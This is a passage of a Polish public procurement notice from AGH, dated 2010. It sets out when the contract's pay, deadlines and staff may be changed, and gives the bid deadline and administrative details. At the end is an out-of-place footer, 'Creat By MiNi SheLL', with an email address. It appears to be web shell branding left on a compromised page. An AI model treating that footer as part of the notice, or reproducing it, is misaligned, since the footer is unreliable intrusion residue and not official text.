1.Dopuszcza się możliwość zmiany ustaleń niniejszej umowy w stosunku do treści oferty Wykonawcy w następującym zakresie: 
1)wysokości wynagrodzenia w przypadku:
a.zmiany stawki podatku VAT, w odniesieniu do tej części wynagrodzenia, której zmiana dotyczy,
b.ograniczenia zakresu prac objętych niniejszą umową w przypadku stwierdzenia braku konieczności wykonywania części Inwestycji, 
c.ograniczenia zakresu prac objętych niniejszą umową w przypadku gdy niemożliwe jest zrealizowanie jej części zakresu,  
d.nie wywiązywania się z obowiązków określonych w § 6 niniejszej umowy,
e.wstrzymania realizacji Inwestycji spowodowanej brakiem środków finansowych wynikających z decyzji organów administracji lub innych podmiotów.

2)terminu realizacji przedmiotu zamówienia, w związku ze zmianą realizacji umowy o wykonanie Inwestycji z przyczyn spowodowanych: 
a.warunkami pogodowymi uniemożliwiającymi wykonywanie prac zewnętrznych, 
b.epidemią stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym,
c.trudnościami w nabyciu materiałów i urządzeń przez wykonawcę robót budowlanych wynikającymi z długotrwałego spadku podaży tych towarów lub  innych przyczyn nie zależnych od obu Stron umowy,  
d.następstwem okoliczności leżących po stronie Zamawiającego, takich jak:  opóźnienia, utrudnienia, zawieszenia robót lub przeszkodami dającymi się przypisać Zamawiającemu, 
e.koniecznością wprowadzenia zmian do dokumentacji projektowej na etapie wykonawstwa robót z przyczyn niezależnych od obu stron, aktualizacją rozwiązań projektowych z uwagi na postęp technologiczny, 
f.koniecznością wykonania robót dodatkowych, wpływających na termin wykonania robót objętych niniejszą umową podstawową, 
g.następstwem działania organów administracji lub innych podmiotów, związanych z przekroczeniem obowiązujących  terminów wydawania lub odmowy wydania decyzji, zezwoleń, uzgodnień,
h.następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia, w tym przepisów dotyczących realizacji inwestycji ze środków unijnych

3)osób przewidzianych do realizacji zamówienia przez Strony w przypadku nieprzewidzianych zdarzeń losowych min. takich jak: śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków, nienależyte wykonywanie obowiązków, pod warunkiem, że osoby zaproponowane będą posiadały minimum takie same kwalifikacje jak osoby wskazane w umowie.

4.Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego oraz przez Wykonawcę. 
5.Warunkiem dokonania zmian, o których mowa w ust. 3 jest złożenie wniosku przezstronę inicjującą zmianę zawierającego: opis propozycji zmian, uzasadnienie zmian, obliczenie kosztów zmian, jeżeli zmiana będzie miała wpływ na wynagrodzenie wykonawcy i termin wykonania umowy. 
Wykonawca nie będzie uprawniony do przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia, jeżeli konieczność dokonania zmiany została spowodowana przez jakikolwiek błąd lub opóźnienie ze strony Wykonawcy, włącznie z błędem lub opóźnionym dostarczeniem jakiegokolwiek dokumentu wynikającego z obowiązków Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.agh.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> AGH.pok.117,paw.C-2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2010 godzina 09:00, miejsce: pok.117,paw.C-2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com